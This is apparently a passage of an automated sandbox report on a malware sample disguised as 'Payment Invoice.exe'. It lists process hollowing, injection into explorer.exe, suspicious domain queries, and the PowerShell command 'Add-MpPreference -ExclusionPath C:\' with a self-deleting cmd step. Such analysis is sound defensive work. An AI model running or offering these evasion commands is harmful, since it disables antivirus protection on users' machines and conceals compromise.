Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]	21_2_0370AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]	21_2_0370AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]	21_2_0370AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]	21_2_036F7E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AAE44 mov eax, dword ptr fs:[00000030h]	21_2_037AAE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AAE44 mov eax, dword ptr fs:[00000030h]	21_2_037AAE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0379FE3F mov eax, dword ptr fs:[00000030h]	21_2_0379FE3F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EE620 mov eax, dword ptr fs:[00000030h]	21_2_036EE620
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371A61C mov eax, dword ptr fs:[00000030h]	21_2_0371A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371A61C mov eax, dword ptr fs:[00000030h]	21_2_0371A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]	21_2_036EC600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]	21_2_036EC600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]	21_2_036EC600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03718E00 mov eax, dword ptr fs:[00000030h]	21_2_03718E00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A1608 mov eax, dword ptr fs:[00000030h]	21_2_037A1608
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F76E2 mov eax, dword ptr fs:[00000030h]	21_2_036F76E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037116E0 mov ecx, dword ptr fs:[00000030h]	21_2_037116E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B8ED6 mov eax, dword ptr fs:[00000030h]	21_2_037B8ED6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03728EC7 mov eax, dword ptr fs:[00000030h]	21_2_03728EC7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0379FEC0 mov eax, dword ptr fs:[00000030h]	21_2_0379FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037136CC mov eax, dword ptr fs:[00000030h]	21_2_037136CC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037646A7 mov eax, dword ptr fs:[00000030h]	21_2_037646A7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_037B0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_037B0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_037B0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0377FE87 mov eax, dword ptr fs:[00000030h]	21_2_0377FE87
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370C577 mov eax, dword ptr fs:[00000030h]	21_2_0370C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0370C577 mov eax, dword ptr fs:[00000030h]	21_2_0370C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03707D50 mov eax, dword ptr fs:[00000030h]	21_2_03707D50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03723D43 mov eax, dword ptr fs:[00000030h]	21_2_03723D43
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03763540 mov eax, dword ptr fs:[00000030h]	21_2_03763540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03793D40 mov eax, dword ptr fs:[00000030h]	21_2_03793D40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0376A537 mov eax, dword ptr fs:[00000030h]	21_2_0376A537
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AE539 mov eax, dword ptr fs:[00000030h]	21_2_037AE539
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]	21_2_03714D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]	21_2_03714D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]	21_2_03714D3B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B8D34 mov eax, dword ptr fs:[00000030h]	21_2_037B8D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]	21_2_036F3D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EAD30 mov eax, dword ptr fs:[00000030h]	21_2_036EAD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03798DF1 mov eax, dword ptr fs:[00000030h]	21_2_03798DF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FD5E0 mov eax, dword ptr fs:[00000030h]	21_2_036FD5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FD5E0 mov eax, dword ptr fs:[00000030h]	21_2_036FD5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_037AFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_037AFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_037AFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_037AFDE2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov ecx, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]	21_2_03766DC9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03711DB5 mov eax, dword ptr fs:[00000030h]	21_2_03711DB5

Source: C:\Users\user\Desktop\Payment Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.the-techs.info
Source: C:\Windows\explorer.exe	Domain query: www.minterfortexas.com

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\Payment Invoice.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Payment Invoice.exe

Memory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 240000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Payment Invoice.exe	Memory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Memory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Memory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: F03008	Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'	Jump to behavior

Source: explorer.exe, 0000000F.00000002.908741366.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000F.00000000.751225821.0000000005E50000.00000004.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Users\user\Desktop\Payment Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
